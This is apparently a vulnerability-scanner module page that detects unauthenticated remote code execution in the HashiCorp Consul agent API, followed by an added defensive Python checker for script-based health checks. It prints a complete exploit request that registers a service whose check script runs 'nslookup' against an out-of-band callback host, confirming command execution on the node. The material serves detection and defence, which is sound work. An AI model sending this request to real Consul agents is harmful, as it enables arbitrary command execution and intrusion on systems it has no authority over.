
Hashicorp Consul Services API - Remote Code Execution

By kannthu

Critical
Vidoc Module
Tags: #hashicorp #rce #oast #intrusive #edb
Description

What is "Hashicorp Consul Services API - Remote Code Execution"?

The "Hashicorp Consul Services API - Remote Code Execution" module detects a vulnerability in the Hashicorp Consul Services API that allows remote code execution on Consul nodes: the agent accepts a service registration whose health check is a script, and then executes that script itself. Consul is a service mesh solution that provides service discovery, configuration, and segmentation capabilities for distributed applications. The vulnerability can be exploited to execute arbitrary commands on the affected nodes, potentially leading to unauthorized access, data breaches, and system compromise.

This module is classified as critical, indicating the severity of the vulnerability and the potential impact it can have on the affected systems.

Author: pikpikcu

Impact

The exploitation of this vulnerability can have severe consequences for the affected systems. By executing arbitrary commands on Consul nodes, an attacker can gain unauthorized access, manipulate data, and compromise the integrity and availability of the system. This can lead to further exploitation, data breaches, and potential damage to the organization's reputation.

How does the module work?

The module sends an HTTP request to the target Consul Services API that registers a new service. The registration carries a health check whose script performs a DNS lookup (nslookup) on an out-of-band interaction URL; when the agent runs the check on its interval, the resulting DNS request shows that the command was executed on the node.

Example HTTP request:

PUT /v1/agent/service/register HTTP/1.1
Host: <Hostname>

{
  "ID": "<randTextAlphanumeric(10)>",
  "Name": "<randTextAlphanumeric(10)>",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "script": "nslookup <InteractionURL>",
    "interval": "10s",
    "Timeout": "86400s"
  }
}

The module's matching condition checks for the word "dns" in the "interactsh_protocol" field of the interaction result. If it matches, a DNS interaction was observed, which confirms that the check script ran, and the module reports the vulnerability.
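As an added, defender-side example (not part of the Vidoc module or of Consul itself), the following Python function inspects a service-registration body like the one above and returns the command of every script-based check it contains, so an API gateway, admission proxy or log pipeline can flag registrations that would make the agent execute a command. The sample body and the interaction hostname are constructed; the handling of `args` alongside the legacy `script` field follows Consul's check definition format, and case-insensitive key matching is an assumption made to mirror Go's JSON decoding.

```python
import json

# Fields in a Consul check definition that make the agent run a command.
# "script" is the legacy form (used in the request above); "args" is the
# current form. Keys are compared case-insensitively (assumption: Consul's
# Go JSON decoder accepts either capitalisation).
COMMAND_FIELDS = {"script", "args", "scriptargs"}


def _checks(body: dict) -> list:
    """Collect check definitions from a service registration body."""
    found = []
    for key, value in body.items():
        k = key.lower()
        if k == "check" and isinstance(value, dict):
            found.append(value)
        elif k == "checks" and isinstance(value, list):
            found.extend(v for v in value if isinstance(v, dict))
    return found


def find_script_checks(raw_body: str) -> list:
    """Return the commands of any script-based checks in a registration body.

    Returns [] for bodies that are not JSON objects or carry no script checks,
    so callers can use the result directly as an alert condition.
    """
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return []
    if not isinstance(body, dict):
        return []
    commands = []
    for check in _checks(body):
        for key, value in check.items():
            if key.lower() in COMMAND_FIELDS:
                if isinstance(value, list):  # "args" is given as an argv list
                    value = " ".join(str(v) for v in value)
                commands.append(str(value))
    return commands


# Constructed sample mirroring the request shown on this page.
SAMPLE_REGISTRATION = """{
  "ID": "svc-abc123", "Name": "svc-abc123",
  "Address": "127.0.0.1", "Port": 80,
  "check": {"script": "nslookup oast.example.invalid",
            "interval": "10s", "Timeout": "86400s"}
}"""

if __name__ == "__main__":
    print(find_script_checks(SAMPLE_REGISTRATION))
```

On the agent side, Consul only executes script checks when `enable_script_checks` or `enable_local_script_checks` is enabled in its configuration, so inspection like this is a second layer behind keeping those settings off and putting ACLs on the agent API.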

Note: The actual JSON definitions and matching conditions are not shown here for brevity.

For more information, refer to the reference.

Module preview

Concurrent Requests (1)
1. HTTP Request template
   Raw request
   Matching conditions: word: dns
Passive global matcher: no matching conditions.
On match action: Report vulnerability